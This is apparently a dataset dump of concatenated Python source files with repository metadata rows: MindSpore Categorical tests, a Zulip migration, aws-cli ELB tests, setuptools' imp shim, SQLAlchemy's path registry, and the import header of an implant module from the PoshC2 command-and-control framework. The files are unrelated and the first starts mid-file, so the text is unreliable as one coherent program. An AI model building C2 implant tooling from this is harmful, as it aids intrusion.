assert isinstance(ans, Tensor)
class CategoricalCrossEntropy(nn.Cell):
"""
Test class: cross_entropy of Categorical distribution.
"""
def __init__(self):
super(CategoricalCrossEntropy, self).__init__()
self.c1 = msd.Categorical([0.1, 0.7, 0.2], dtype=dtype.int32)
self.c2 = msd.Categorical(dtype=dtype.int32)
def construct(self, probs_b, probs_a):
h1 = self.c1.cross_entropy('Categorical', probs_b)
h2 = self.c2.cross_entropy('Categorical', probs_b, probs_a)
return h1 + h2
@pytest.mark.skipif(skip_flag, reason="not supported on CPU")
def test_cross_entropy():
"""
Test cross_entropy between Categorical distributions.
"""
net = CategoricalCrossEntropy()
probs_b = Tensor([0.3, 0.1, 0.6], dtype=dtype.float32)
probs_a = Tensor([0.7, 0.2, 0.1], dtype=dtype.float32)
ans = net(probs_b, probs_a)
assert isinstance(ans, Tensor)
class CategoricalConstruct(nn.Cell):
"""
Categorical distribution: going through construct.
"""
def __init__(self):
super(CategoricalConstruct, self).__init__()
self.c = msd.Categorical([0.1, 0.8, 0.1], dtype=dtype.int32)
self.c1 = msd.Categorical(dtype=dtype.int32)
def construct(self, value, probs):
prob = self.c('prob', value)
prob1 = self.c('prob', value, probs)
prob2 = self.c1('prob', value, probs)
return prob + prob1 + prob2
@pytest.mark.skipif(skip_flag, reason="not supported on CPU")
def test_categorical_construct():
"""
Test probability function going through construct.
"""
net = CategoricalConstruct()
value = Tensor([0, 1, 2, 0, 0], dtype=dtype.float32)
probs = Tensor([0.5, 0.4, 0.1], dtype=dtype.float32)
ans = net(value, probs)
assert isinstance(ans, Tensor)
class CategoricalBasics(nn.Cell):
"""
Test class: basic mean/var/mode/entropy function.
"""
def __init__(self):
super(CategoricalBasics, self).__init__()
self.c = msd.Categorical([0.2, 0.7, 0.1], dtype=dtype.int32)
self.c1 = msd.Categorical(dtype=dtype.int32)
def construct(self, probs):
basics1 = self.c.mean() + self.c.var() + self.c.mode() + self.c.entropy()
basics2 = self.c1.mean(probs) + self.c1.var(probs) +\
self.c1.mode(probs) + self.c1.entropy(probs)
return basics1 + basics2
@pytest.mark.skipif(skip_flag, reason="not supported on CPU")
def test_basics():
"""
Test basics functionality of Categorical distribution.
"""
net = CategoricalBasics()
probs = Tensor([0.7, 0.2, 0.1], dtype=dtype.float32)
ans = net(probs)
assert isinstance(ans, Tensor)
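# A minimal eager-mode sketch of using the distribution directly, outside a
# Cell (assumes PyNative execution on the current device; the probabilities
# and values below are arbitrary examples, not fixtures from this suite):
def example_direct_usage():
    c = msd.Categorical([0.7, 0.3], dtype=dtype.int32)
    value = Tensor([0, 1, 0], dtype=dtype.float32)
    return c.prob(value), c.mean(), c.entropy()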
|
a4fc7c5a8599e10ea4b3c0a74333e04ad5bd7b98
|
952dc66c61966f099756cdb6c2d13b40352f63cc
|
/zerver/migrations/0044_reaction.py
|
6d2db44e49eb660b6e4d0e247233f336bf39150a
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
zulip/zulip
|
5ae6aad35fd9f72996c0a2a9cdd674400966ebf6
|
965a25d91b6ee2db54038f5df855215fa25146b0
|
refs/heads/main
| 2023-08-28T23:43:00.971110
| 2023-08-28T16:47:09
| 2023-08-28T19:33:02
| 43,160,685
| 20,239
| 8,996
|
Apache-2.0
| 2023-09-14T20:57:47
| 2015-09-25T16:37:25
|
Python
|
UTF-8
|
Python
| false
| false
| 1,272
|
py
|
0044_reaction.py
|
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("zerver", "0043_realm_filter_validators"),
]
operations = [
migrations.CreateModel(
name="Reaction",
fields=[
(
"id",
models.AutoField(
verbose_name="ID", serialize=False, auto_created=True, primary_key=True
),
),
(
"user_profile",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL
),
),
(
"message",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="zerver.Message"
),
),
("emoji_name", models.TextField()),
],
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name="reaction",
unique_together={("user_profile", "message", "emoji_name")},
),
]
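# A hedged note on the unique constraint above: it means a given user can
# react to a given message with a given emoji at most once. Illustrative
# ORM usage (u and m are hypothetical instances, not part of this migration):
#
#   Reaction.objects.create(user_profile=u, message=m, emoji_name="smile")
#   # creating the same (user_profile, message, emoji_name) triple again
#   # raises django.db.utils.IntegrityError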
|
fcc405bf3c35535b8fde695aba3facaccfa1926e
|
ad61cc119a42abfd3d64224a753817ae0f9ba058
|
/tests/functional/elb/test_configure_health_check.py
|
67fb1d75ef9744998cb26dd770610cfe0747d2d9
|
[
"Apache-2.0"
] |
permissive
|
aws/aws-cli
|
30b0e5b0fb6d736f1540990955f0a7351ee7a908
|
147d16dfdb72dc9cf362b676a57e46a49375afbd
|
refs/heads/develop
| 2023-09-03T19:52:07.955543
| 2023-09-01T20:37:50
| 2023-09-01T20:37:50
| 6,780,767
| 13,038
| 4,107
|
NOASSERTION
| 2023-09-13T19:48:11
| 2012-11-20T16:07:36
|
Python
|
UTF-8
|
Python
| false
| false
| 2,737
|
py
|
test_configure_health_check.py
|
#!/usr/bin/env python
# Copyright 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from awscli.testutils import BaseAWSCommandParamsTest
class TestConfigureHealthCheck(BaseAWSCommandParamsTest):
prefix = 'elb configure-health-check'
def test_shorthand_basic(self):
cmdline = self.prefix
cmdline += ' --load-balancer-name my-lb'
cmdline += (' --health-check Target=HTTP:80/weather/us/wa/seattle,'
'Interval=300,Timeout=60,UnhealthyThreshold=5,'
'HealthyThreshold=9')
result = {
'HealthCheck': {
'HealthyThreshold': 9,
'Interval': 300,
'Target': 'HTTP:80/weather/us/wa/seattle',
'Timeout': 60,
'UnhealthyThreshold': 5},
'LoadBalancerName': 'my-lb'}
self.assert_params_for_cmd(cmdline, result)
def test_json(self):
cmdline = self.prefix
cmdline += ' --load-balancer-name my-lb '
cmdline += ('--health-check {"Target":"HTTP:80/weather/us/wa/seattle'
'?a=b","Interval":300,"Timeout":60,'
'"UnhealthyThreshold":5,"HealthyThreshold":9}')
result = {
'HealthCheck': {
'HealthyThreshold': 9,
'Interval': 300,
'Target': 'HTTP:80/weather/us/wa/seattle?a=b',
'Timeout': 60,
'UnhealthyThreshold': 5},
'LoadBalancerName': 'my-lb'}
self.assert_params_for_cmd(cmdline, result)
def test_shorthand_with_multiple_equals_for_value(self):
cmdline = self.prefix
cmdline += ' --load-balancer-name my-lb'
cmdline += (
' --health-check Target="HTTP:80/weather/us/wa/seattle?a=b"'
',Interval=300,Timeout=60,UnhealthyThreshold=5,'
'HealthyThreshold=9'
)
result = {
'HealthCheck': {
'HealthyThreshold': 9,
'Interval': 300,
'Target': 'HTTP:80/weather/us/wa/seattle?a=b',
'Timeout': 60,
'UnhealthyThreshold': 5},
'LoadBalancerName': 'my-lb'}
self.assert_params_for_cmd(cmdline, result)
|
b278f91f6018268cbf5eef74c773bedc12ea3369
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/setuptools/py3/setuptools/_imp.py
|
9d4ead0eb036be85c7681c74ef933969de0a6ceb
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 2,433
|
py
|
_imp.py
|
"""
Re-implementation of find_module and get_frozen_object
from the deprecated imp module.
"""
import os
import importlib.util
import importlib.machinery
from importlib.util import module_from_spec
PY_SOURCE = 1
PY_COMPILED = 2
C_EXTENSION = 3
C_BUILTIN = 6
PY_FROZEN = 7
def find_spec(module, paths):
finder = (
importlib.machinery.PathFinder().find_spec
if isinstance(paths, list)
else importlib.util.find_spec
)
return finder(module, paths)
def find_module(module, paths=None):
"""Just like 'imp.find_module()', but with package support"""
spec = find_spec(module, paths)
if spec is None:
raise ImportError("Can't find %s" % module)
if not spec.has_location and hasattr(spec, 'submodule_search_locations'):
spec = importlib.util.spec_from_loader('__init__.py', spec.loader)
kind = -1
file = None
static = isinstance(spec.loader, type)
if (
spec.origin == 'frozen'
or static
and issubclass(spec.loader, importlib.machinery.FrozenImporter)
):
kind = PY_FROZEN
        path = None  # imp compatibility
suffix = mode = '' # imp compatibility
elif (
spec.origin == 'built-in'
or static
and issubclass(spec.loader, importlib.machinery.BuiltinImporter)
):
kind = C_BUILTIN
        path = None  # imp compatibility
suffix = mode = '' # imp compatibility
elif spec.has_location:
path = spec.origin
suffix = os.path.splitext(path)[1]
mode = 'r' if suffix in importlib.machinery.SOURCE_SUFFIXES else 'rb'
if suffix in importlib.machinery.SOURCE_SUFFIXES:
kind = PY_SOURCE
elif suffix in importlib.machinery.BYTECODE_SUFFIXES:
kind = PY_COMPILED
elif suffix in importlib.machinery.EXTENSION_SUFFIXES:
kind = C_EXTENSION
if kind in {PY_SOURCE, PY_COMPILED}:
file = open(path, mode)
else:
path = None
suffix = mode = ''
return file, path, (suffix, mode, kind)
def get_frozen_object(module, paths=None):
spec = find_spec(module, paths)
if not spec:
raise ImportError("Can't find %s" % module)
return spec.loader.get_code(module)
def get_module(module, paths, info):
spec = find_spec(module, paths)
if not spec:
raise ImportError("Can't find %s" % module)
return module_from_spec(spec)
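# A minimal sketch of exercising these shims (the module name "json" is an
# arbitrary example, not part of this module's API). find_module() returns
# an open file handle for source/bytecode modules, so close it when done.
if __name__ == "__main__":
    file, path, (suffix, mode, kind) = find_module("json")
    print(path, suffix, mode, kind)  # expect kind == PY_SOURCE for json
    if file is not None:
        file.close()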
|
073465b149e7b250e34f802ba30c3bbff8db5406
|
0ca218c0f54dac33a2ade4accfdf8f5be3207588
|
/lib/sqlalchemy/orm/path_registry.py
|
2cd8a1412c4d2e1b91b913970088b8e839b0e702
|
[
"MIT"
] |
permissive
|
sqlalchemy/sqlalchemy
|
9d949c67c9b5396b1f33e7ff0f3230c81babf5be
|
b382bff6e3464f039db0fd1f2ce1b79038675e48
|
refs/heads/main
| 2023-08-31T17:40:59.565421
| 2023-08-30T15:01:41
| 2023-08-30T15:01:41
| 159,271,175
| 8,083
| 1,489
|
MIT
| 2023-09-12T18:53:55
| 2018-11-27T03:35:03
|
Python
|
UTF-8
|
Python
| false
| false
| 25,626
|
py
|
path_registry.py
|
# orm/path_registry.py
# Copyright (C) 2005-2023 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""Path tracking utilities, representing mapper graph traversals.
"""
from __future__ import annotations
from functools import reduce
from itertools import chain
import logging
import operator
from typing import Any
from typing import cast
from typing import Dict
from typing import Iterator
from typing import List
from typing import Optional
from typing import overload
from typing import Sequence
from typing import Tuple
from typing import TYPE_CHECKING
from typing import Union
from . import base as orm_base
from ._typing import insp_is_mapper_property
from .. import exc
from .. import util
from ..sql import visitors
from ..sql.cache_key import HasCacheKey
if TYPE_CHECKING:
from ._typing import _InternalEntityType
from .interfaces import MapperProperty
from .mapper import Mapper
from .relationships import RelationshipProperty
from .util import AliasedInsp
from ..sql.cache_key import _CacheKeyTraversalType
from ..sql.elements import BindParameter
from ..sql.visitors import anon_map
from ..util.typing import _LiteralStar
from ..util.typing import TypeGuard
def is_root(path: PathRegistry) -> TypeGuard[RootRegistry]:
...
def is_entity(path: PathRegistry) -> TypeGuard[AbstractEntityRegistry]:
...
else:
is_root = operator.attrgetter("is_root")
is_entity = operator.attrgetter("is_entity")
_SerializedPath = List[Any]
_PathElementType = Union[
str, "_InternalEntityType[Any]", "MapperProperty[Any]"
]
# the representation is in fact
# a tuple with alternating:
# [_InternalEntityType[Any], Union[str, MapperProperty[Any]],
# _InternalEntityType[Any], Union[str, MapperProperty[Any]], ...]
# this might someday be a tuple of 2-tuples instead, but paths can be
# chopped at odd intervals as well so this is less flexible
_PathRepresentation = Tuple[_PathElementType, ...]
_OddPathRepresentation = Sequence["_InternalEntityType[Any]"]
_EvenPathRepresentation = Sequence[Union["MapperProperty[Any]", str]]
log = logging.getLogger(__name__)
def _unreduce_path(path: _SerializedPath) -> PathRegistry:
return PathRegistry.deserialize(path)
_WILDCARD_TOKEN: _LiteralStar = "*"
_DEFAULT_TOKEN = "_sa_default"
class PathRegistry(HasCacheKey):
"""Represent query load paths and registry functions.
Basically represents structures like:
(<User mapper>, "orders", <Order mapper>, "items", <Item mapper>)
These structures are generated by things like
query options (joinedload(), subqueryload(), etc.) and are
used to compose keys stored in the query._attributes dictionary
for various options.
They are then re-composed at query compile/result row time as
the query is formed and as rows are fetched, where they again
serve to compose keys to look up options in the context.attributes
dictionary, which is copied from query._attributes.
The path structure has a limited amount of caching, where each
"root" ultimately pulls from a fixed registry associated with
the first mapper, that also contains elements for each of its
property keys. However paths longer than two elements, which
are the exception rather than the rule, are generated on an
as-needed basis.
"""
__slots__ = ()
is_token = False
is_root = False
has_entity = False
is_property = False
is_entity = False
is_unnatural: bool
path: _PathRepresentation
natural_path: _PathRepresentation
parent: Optional[PathRegistry]
root: RootRegistry
_cache_key_traversal: _CacheKeyTraversalType = [
("path", visitors.ExtendedInternalTraversal.dp_has_cache_key_list)
]
def __eq__(self, other: Any) -> bool:
try:
return other is not None and self.path == other._path_for_compare
except AttributeError:
util.warn(
"Comparison of PathRegistry to %r is not supported"
% (type(other))
)
return False
def __ne__(self, other: Any) -> bool:
try:
return other is None or self.path != other._path_for_compare
except AttributeError:
util.warn(
"Comparison of PathRegistry to %r is not supported"
% (type(other))
)
return True
@property
def _path_for_compare(self) -> Optional[_PathRepresentation]:
return self.path
def set(self, attributes: Dict[Any, Any], key: Any, value: Any) -> None:
log.debug("set '%s' on path '%s' to '%s'", key, self, value)
attributes[(key, self.natural_path)] = value
def setdefault(
self, attributes: Dict[Any, Any], key: Any, value: Any
) -> None:
log.debug("setdefault '%s' on path '%s' to '%s'", key, self, value)
attributes.setdefault((key, self.natural_path), value)
def get(
self, attributes: Dict[Any, Any], key: Any, value: Optional[Any] = None
) -> Any:
key = (key, self.natural_path)
if key in attributes:
return attributes[key]
else:
return value
def __len__(self) -> int:
return len(self.path)
def __hash__(self) -> int:
return id(self)
@overload
def __getitem__(self, entity: str) -> TokenRegistry:
...
@overload
def __getitem__(self, entity: int) -> _PathElementType:
...
@overload
def __getitem__(self, entity: slice) -> _PathRepresentation:
...
@overload
def __getitem__(
self, entity: _InternalEntityType[Any]
) -> AbstractEntityRegistry:
...
@overload
def __getitem__(self, entity: MapperProperty[Any]) -> PropRegistry:
...
def __getitem__(
self,
entity: Union[
str, int, slice, _InternalEntityType[Any], MapperProperty[Any]
],
) -> Union[
TokenRegistry,
_PathElementType,
_PathRepresentation,
PropRegistry,
AbstractEntityRegistry,
]:
raise NotImplementedError()
# TODO: what are we using this for?
@property
def length(self) -> int:
return len(self.path)
def pairs(
self,
) -> Iterator[
Tuple[_InternalEntityType[Any], Union[str, MapperProperty[Any]]]
]:
odd_path = cast(_OddPathRepresentation, self.path)
even_path = cast(_EvenPathRepresentation, odd_path)
for i in range(0, len(odd_path), 2):
yield odd_path[i], even_path[i + 1]
def contains_mapper(self, mapper: Mapper[Any]) -> bool:
_m_path = cast(_OddPathRepresentation, self.path)
for path_mapper in [_m_path[i] for i in range(0, len(_m_path), 2)]:
if path_mapper.mapper.isa(mapper):
return True
else:
return False
def contains(self, attributes: Dict[Any, Any], key: Any) -> bool:
return (key, self.path) in attributes
def __reduce__(self) -> Any:
return _unreduce_path, (self.serialize(),)
@classmethod
def _serialize_path(cls, path: _PathRepresentation) -> _SerializedPath:
_m_path = cast(_OddPathRepresentation, path)
_p_path = cast(_EvenPathRepresentation, path)
return list(
zip(
tuple(
m.class_ if (m.is_mapper or m.is_aliased_class) else str(m)
for m in [_m_path[i] for i in range(0, len(_m_path), 2)]
),
tuple(
p.key if insp_is_mapper_property(p) else str(p)
for p in [_p_path[i] for i in range(1, len(_p_path), 2)]
)
+ (None,),
)
)
@classmethod
def _deserialize_path(cls, path: _SerializedPath) -> _PathRepresentation:
def _deserialize_mapper_token(mcls: Any) -> Any:
return (
                # note: we likely don't want configure=True here, however
# this is maintained at the moment for backwards compatibility
orm_base._inspect_mapped_class(mcls, configure=True)
if mcls not in PathToken._intern
else PathToken._intern[mcls]
)
def _deserialize_key_token(mcls: Any, key: Any) -> Any:
if key is None:
return None
elif key in PathToken._intern:
return PathToken._intern[key]
else:
mp = orm_base._inspect_mapped_class(mcls, configure=True)
assert mp is not None
return mp.attrs[key]
p = tuple(
chain(
*[
(
_deserialize_mapper_token(mcls),
_deserialize_key_token(mcls, key),
)
for mcls, key in path
]
)
)
if p and p[-1] is None:
p = p[0:-1]
return p
def serialize(self) -> _SerializedPath:
path = self.path
return self._serialize_path(path)
@classmethod
def deserialize(cls, path: _SerializedPath) -> PathRegistry:
assert path is not None
p = cls._deserialize_path(path)
return cls.coerce(p)
@overload
@classmethod
def per_mapper(cls, mapper: Mapper[Any]) -> CachingEntityRegistry:
...
@overload
@classmethod
def per_mapper(cls, mapper: AliasedInsp[Any]) -> SlotsEntityRegistry:
...
@classmethod
def per_mapper(
cls, mapper: _InternalEntityType[Any]
) -> AbstractEntityRegistry:
if mapper.is_mapper:
return CachingEntityRegistry(cls.root, mapper)
else:
return SlotsEntityRegistry(cls.root, mapper)
@classmethod
def coerce(cls, raw: _PathRepresentation) -> PathRegistry:
def _red(prev: PathRegistry, next_: _PathElementType) -> PathRegistry:
return prev[next_]
# can't quite get mypy to appreciate this one :)
return reduce(_red, raw, cls.root) # type: ignore
def __add__(self, other: PathRegistry) -> PathRegistry:
def _red(prev: PathRegistry, next_: _PathElementType) -> PathRegistry:
return prev[next_]
return reduce(_red, other.path, self)
def __str__(self) -> str:
return f"ORM Path[{' -> '.join(str(elem) for elem in self.path)}]"
def __repr__(self) -> str:
return f"{self.__class__.__name__}({self.path!r})"
class CreatesToken(PathRegistry):
__slots__ = ()
is_aliased_class: bool
is_root: bool
def token(self, token: str) -> TokenRegistry:
if token.endswith(f":{_WILDCARD_TOKEN}"):
return TokenRegistry(self, token)
elif token.endswith(f":{_DEFAULT_TOKEN}"):
return TokenRegistry(self.root, token)
else:
raise exc.ArgumentError(f"invalid token: {token}")
class RootRegistry(CreatesToken):
"""Root registry, defers to mappers so that
paths are maintained per-root-mapper.
"""
__slots__ = ()
inherit_cache = True
path = natural_path = ()
has_entity = False
is_aliased_class = False
is_root = True
is_unnatural = False
def _getitem(
self, entity: Any
) -> Union[TokenRegistry, AbstractEntityRegistry]:
if entity in PathToken._intern:
if TYPE_CHECKING:
assert isinstance(entity, str)
return TokenRegistry(self, PathToken._intern[entity])
else:
try:
return entity._path_registry # type: ignore
except AttributeError:
raise IndexError(
f"invalid argument for RootRegistry.__getitem__: {entity}"
)
def _truncate_recursive(self) -> RootRegistry:
return self
if not TYPE_CHECKING:
__getitem__ = _getitem
PathRegistry.root = RootRegistry()
class PathToken(orm_base.InspectionAttr, HasCacheKey, str):
"""cacheable string token"""
_intern: Dict[str, PathToken] = {}
def _gen_cache_key(
self, anon_map: anon_map, bindparams: List[BindParameter[Any]]
) -> Tuple[Any, ...]:
return (str(self),)
@property
def _path_for_compare(self) -> Optional[_PathRepresentation]:
return None
@classmethod
def intern(cls, strvalue: str) -> PathToken:
if strvalue in cls._intern:
return cls._intern[strvalue]
else:
cls._intern[strvalue] = result = PathToken(strvalue)
return result
class TokenRegistry(PathRegistry):
__slots__ = ("token", "parent", "path", "natural_path")
inherit_cache = True
token: str
parent: CreatesToken
def __init__(self, parent: CreatesToken, token: str):
token = PathToken.intern(token)
self.token = token
self.parent = parent
self.path = parent.path + (token,)
self.natural_path = parent.natural_path + (token,)
has_entity = False
is_token = True
def generate_for_superclasses(self) -> Iterator[PathRegistry]:
# NOTE: this method is no longer used. consider removal
parent = self.parent
if is_root(parent):
yield self
return
if TYPE_CHECKING:
assert isinstance(parent, AbstractEntityRegistry)
if not parent.is_aliased_class:
for mp_ent in parent.mapper.iterate_to_root():
yield TokenRegistry(parent.parent[mp_ent], self.token)
elif (
parent.is_aliased_class
and cast(
"AliasedInsp[Any]",
parent.entity,
)._is_with_polymorphic
):
yield self
for ent in cast(
"AliasedInsp[Any]", parent.entity
)._with_polymorphic_entities:
yield TokenRegistry(parent.parent[ent], self.token)
else:
yield self
def _generate_natural_for_superclasses(
self,
) -> Iterator[_PathRepresentation]:
parent = self.parent
if is_root(parent):
yield self.natural_path
return
if TYPE_CHECKING:
assert isinstance(parent, AbstractEntityRegistry)
for mp_ent in parent.mapper.iterate_to_root():
yield TokenRegistry(parent.parent[mp_ent], self.token).natural_path
if (
parent.is_aliased_class
and cast(
"AliasedInsp[Any]",
parent.entity,
)._is_with_polymorphic
):
yield self.natural_path
for ent in cast(
"AliasedInsp[Any]", parent.entity
)._with_polymorphic_entities:
yield (
TokenRegistry(parent.parent[ent], self.token).natural_path
)
else:
yield self.natural_path
def _getitem(self, entity: Any) -> Any:
try:
return self.path[entity]
except TypeError as err:
raise IndexError(f"{entity}") from err
if not TYPE_CHECKING:
__getitem__ = _getitem
class PropRegistry(PathRegistry):
__slots__ = (
"prop",
"parent",
"path",
"natural_path",
"has_entity",
"entity",
"mapper",
"_wildcard_path_loader_key",
"_default_path_loader_key",
"_loader_key",
"is_unnatural",
)
inherit_cache = True
is_property = True
prop: MapperProperty[Any]
mapper: Optional[Mapper[Any]]
entity: Optional[_InternalEntityType[Any]]
def __init__(
self, parent: AbstractEntityRegistry, prop: MapperProperty[Any]
):
# restate this path in terms of the
# given MapperProperty's parent.
insp = cast("_InternalEntityType[Any]", parent[-1])
natural_parent: AbstractEntityRegistry = parent
# inherit "is_unnatural" from the parent
self.is_unnatural = parent.parent.is_unnatural or bool(
parent.mapper.inherits
)
if not insp.is_aliased_class or insp._use_mapper_path: # type: ignore
parent = natural_parent = parent.parent[prop.parent]
elif (
insp.is_aliased_class
and insp.with_polymorphic_mappers
and prop.parent in insp.with_polymorphic_mappers
):
subclass_entity: _InternalEntityType[Any] = parent[-1]._entity_for_mapper(prop.parent) # type: ignore # noqa: E501
parent = parent.parent[subclass_entity]
# when building a path where with_polymorphic() is in use,
# special logic to determine the "natural path" when subclass
# entities are used.
#
# here we are trying to distinguish between a path that starts
            # on the with_polymorphic entity vs. one that starts on a
# normal entity that introduces a with_polymorphic() in the
# middle using of_type():
#
# # as in test_polymorphic_rel->
# # test_subqueryload_on_subclass_uses_path_correctly
# wp = with_polymorphic(RegularEntity, "*")
# sess.query(wp).options(someload(wp.SomeSubEntity.foos))
#
# vs
#
# # as in test_relationship->JoinedloadWPolyOfTypeContinued
# wp = with_polymorphic(SomeFoo, "*")
# sess.query(RegularEntity).options(
# someload(RegularEntity.foos.of_type(wp))
# .someload(wp.SubFoo.bar)
# )
#
# in the former case, the Query as it generates a path that we
# want to match will be in terms of the with_polymorphic at the
# beginning. in the latter case, Query will generate simple
# paths that don't know about this with_polymorphic, so we must
# use a separate natural path.
#
#
if parent.parent:
natural_parent = parent.parent[subclass_entity.mapper]
self.is_unnatural = True
else:
natural_parent = parent
elif (
natural_parent.parent
and insp.is_aliased_class
and prop.parent # this should always be the case here
is not insp.mapper
and insp.mapper.isa(prop.parent)
):
natural_parent = parent.parent[prop.parent]
self.prop = prop
self.parent = parent
self.path = parent.path + (prop,)
self.natural_path = natural_parent.natural_path + (prop,)
self.has_entity = prop._links_to_entity
if prop._is_relationship:
if TYPE_CHECKING:
assert isinstance(prop, RelationshipProperty)
self.entity = prop.entity
self.mapper = prop.mapper
else:
self.entity = None
self.mapper = None
self._wildcard_path_loader_key = (
"loader",
parent.natural_path + self.prop._wildcard_token, # type: ignore
)
self._default_path_loader_key = self.prop._default_path_loader_key
self._loader_key = ("loader", self.natural_path)
def _truncate_recursive(self) -> PropRegistry:
earliest = None
for i, token in enumerate(reversed(self.path[:-1])):
if token is self.prop:
earliest = i
if earliest is None:
return self
else:
return self.coerce(self.path[0 : -(earliest + 1)]) # type: ignore
@property
def entity_path(self) -> AbstractEntityRegistry:
assert self.entity is not None
return self[self.entity]
def _getitem(
self, entity: Union[int, slice, _InternalEntityType[Any]]
) -> Union[AbstractEntityRegistry, _PathElementType, _PathRepresentation]:
if isinstance(entity, (int, slice)):
return self.path[entity]
else:
return SlotsEntityRegistry(self, entity)
if not TYPE_CHECKING:
__getitem__ = _getitem
class AbstractEntityRegistry(CreatesToken):
__slots__ = (
"key",
"parent",
"is_aliased_class",
"path",
"entity",
"natural_path",
)
has_entity = True
is_entity = True
parent: Union[RootRegistry, PropRegistry]
key: _InternalEntityType[Any]
entity: _InternalEntityType[Any]
is_aliased_class: bool
def __init__(
self,
parent: Union[RootRegistry, PropRegistry],
entity: _InternalEntityType[Any],
):
self.key = entity
self.parent = parent
self.is_aliased_class = entity.is_aliased_class
self.entity = entity
self.path = parent.path + (entity,)
# the "natural path" is the path that we get when Query is traversing
# from the lead entities into the various relationships; it corresponds
# to the structure of mappers and relationships. when we are given a
        # path that comes from loader options; as of 1.3 it can have ad-hoc
# with_polymorphic() and other AliasedInsp objects inside of it, which
# are usually not present in mappings. So here we track both the
# "enhanced" path in self.path and the "natural" path that doesn't
# include those objects so these two traversals can be matched up.
        # the test here for "(self.is_aliased_class or parent.is_unnatural)"
        # is to avoid the more expensive conditional logic that follows if we
        # know we don't have to do it. This conditional could just as well be
        # "if parent.path:"; it just makes more function calls.
#
# This is basically the only place that the "is_unnatural" flag
# actually changes behavior.
if parent.path and (self.is_aliased_class or parent.is_unnatural):
# this is an infrequent code path used only for loader strategies
# that also make use of of_type().
if entity.mapper.isa(parent.natural_path[-1].mapper): # type: ignore # noqa: E501
self.natural_path = parent.natural_path + (entity.mapper,)
else:
self.natural_path = parent.natural_path + (
parent.natural_path[-1].entity, # type: ignore
)
# it seems to make sense that since these paths get mixed up
# with statements that are cached or not, we should make
# sure the natural path is cacheable across different occurrences
# of equivalent AliasedClass objects. however, so far this
# does not seem to be needed for whatever reason.
# elif not parent.path and self.is_aliased_class:
# self.natural_path = (self.entity._generate_cache_key()[0], )
else:
self.natural_path = self.path
def _truncate_recursive(self) -> AbstractEntityRegistry:
return self.parent._truncate_recursive()[self.entity]
@property
def root_entity(self) -> _InternalEntityType[Any]:
return cast("_InternalEntityType[Any]", self.path[0])
@property
def entity_path(self) -> PathRegistry:
return self
@property
def mapper(self) -> Mapper[Any]:
return self.entity.mapper
def __bool__(self) -> bool:
return True
def _getitem(
self, entity: Any
) -> Union[_PathElementType, _PathRepresentation, PathRegistry]:
if isinstance(entity, (int, slice)):
return self.path[entity]
elif entity in PathToken._intern:
return TokenRegistry(self, PathToken._intern[entity])
else:
return PropRegistry(self, entity)
if not TYPE_CHECKING:
__getitem__ = _getitem
class SlotsEntityRegistry(AbstractEntityRegistry):
# for aliased class, return lightweight, no-cycles created
# version
inherit_cache = True
class _ERDict(Dict[Any, Any]):
def __init__(self, registry: CachingEntityRegistry):
self.registry = registry
def __missing__(self, key: Any) -> PropRegistry:
self[key] = item = PropRegistry(self.registry, key)
return item
class CachingEntityRegistry(AbstractEntityRegistry):
# for long lived mapper, return dict based caching
# version that creates reference cycles
__slots__ = ("_cache",)
inherit_cache = True
def __init__(
self,
parent: Union[RootRegistry, PropRegistry],
entity: _InternalEntityType[Any],
):
super().__init__(parent, entity)
self._cache = _ERDict(self)
def pop(self, key: Any, default: Any) -> Any:
return self._cache.pop(key, default)
def _getitem(self, entity: Any) -> Any:
if isinstance(entity, (int, slice)):
return self.path[entity]
elif isinstance(entity, PathToken):
return TokenRegistry(self, entity)
else:
return self._cache[entity]
if not TYPE_CHECKING:
__getitem__ = _getitem
if TYPE_CHECKING:
def path_is_entity(
path: PathRegistry,
) -> TypeGuard[AbstractEntityRegistry]:
...
def path_is_property(path: PathRegistry) -> TypeGuard[PropRegistry]:
...
else:
path_is_entity = operator.attrgetter("is_entity")
path_is_property = operator.attrgetter("is_property")
|
5454f5d95b96a153c06f3ceca1907231ff22cb58
|
3e00405025535eb1a1829b70f9e984ea9bb76fc5
|
/poshc2/server/Implant.py
|
582470e0581f110afa12b67326bc9ad93e8a57d9
|
[
"BSD-3-Clause"
] |
permissive
|
nettitude/PoshC2
|
5d1fdfbd53ee82e6fb145bde5cbb1afc6b2067ed
|
517903431ab43e6d714b24b0752ba111f5d4c2f1
|
refs/heads/master
| 2023-08-24T17:45:43.198409
| 2022-07-12T11:12:28
| 2022-08-01T09:09:15
| 141,987,967
| 1,378
| 299
|
BSD-3-Clause
| 2023-07-23T22:14:04
| 2018-07-23T08:53:32
|
PowerShell
|
UTF-8
|
Python
| false
| false
| 8,606
|
py
|
Implant.py
|
import urllib, base64, http.client, re, json
from datetime import datetime, timezone
from poshc2.Colours import Colours
from poshc2.Utils import randomuri, gen_key
from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, Jitter, NotificationsProjectName
from poshc2.server.Core import get_images
from poshc2.server.AutoLoads import run_autoloads
from poshc2.server.database.DB import select_item, get_defaultbeacon, get_killdate, get_dfheader, get_otherbeaconurls, update_label
